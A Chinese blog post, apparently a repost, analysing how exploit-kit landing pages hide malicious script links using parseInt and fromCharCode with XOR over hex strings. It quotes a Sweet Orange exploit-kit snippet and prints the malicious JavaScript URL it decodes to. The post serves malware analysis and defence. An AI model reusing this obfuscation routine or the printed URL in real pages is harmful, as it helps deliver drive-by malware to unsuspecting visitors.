码迷,mamicode.com
首页 > 其他好文 > 详细

EK中fromCharCode和parseInt的配合使用

时间:2014-11-10 21:55:28      阅读:278      评论:0      收藏:0      [点我收藏+]

标签:ek   javascript漏洞   

       基于web的漏洞攻击的第一步通常是:在landing page中通过<script>标签下的JavaScript脚本引入一些恶意链接。这些脚本往往会采用各种各样的混淆、加密手法来躲避AV和browser的拦截,以使得一些恶意脚本源代码不轻易暴露。即使这些landing page被拦截,设计精巧的混淆手法也能加大安全工程师对恶意代码的分析难度。

       利用JavaScript内置的parseInt函数和String对象的fromCharCode函数配合使用,来加密恶意脚本是一种常见的手法。先简单说明两个函数:

1、parseInt(string, radix):解析一个字符串并返回一个整数

参数说明: string 必须,要被解析的字符串

     radix   可选,表示要解析的数字的基数,该值介于2-36之间。如果省略,则表示按十进制来解析(除非第一个参数是以0x开头的字符串,则按16进展来解析)。如     果该参数小于2或大于36则返回NaN。

2、String.formCharCode(numX1, numX2, ..., numXn):介绍一个或多个指定的unicode值,返回对应的字符串


        parseInt和fromCharCode配合加密的流程通常是:对于一段数字形式的字符串,由parseInt依次解析为数字,解析出来的数字再由fromCharCode转化为对应的字符串。下面截取2014-10-06发现的sweet orange EK中的一段脚本为例说明:

<span style="font-size:14px;">var PmD = "e111d1b1ab1df058e249a23c274896bde041c016a0dc1f534e24ce29c31a6d3dbcdd4750b95ed6532bdfa7c16dc0dde4b9013fb32af2770affa5c7fa3d966932ee31d91505f93aa616";
var uSVpT = "8965a5c19132df3e832ad653553bb8d88738b062c9bd71302150ba46ad690554cea9347eda31bb7c5bb0ceaf09a5a590dc7310c34f801270d0ccb59b53b90d408141bd7a729714cc65";
var GOGP = "";
var w = 0x00;
for (var i = 0; i < (PmD.length / 2); i++) {
     GOGP += String.fromCharCode(parseInt((PmD[w] + PmD[w + 1]), 16) ^ parseInt((uSVpT[w] + uSVpT[w + 1]), 16));
     w += 2;
}</span>
解密出来的字符串保存在GOGP中,真正内容为:

http://factors.egyptiancottonshirts.com/poindexter/perez/iran/dropdown.js


该链接包含恶意的js脚本,已被chrome拦截:


bubuko.com,布布扣

EK中fromCharCode和parseInt的配合使用

标签:ek   javascript漏洞   

原文地址:http://blog.csdn.net/lc_910927/article/details/40983915

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!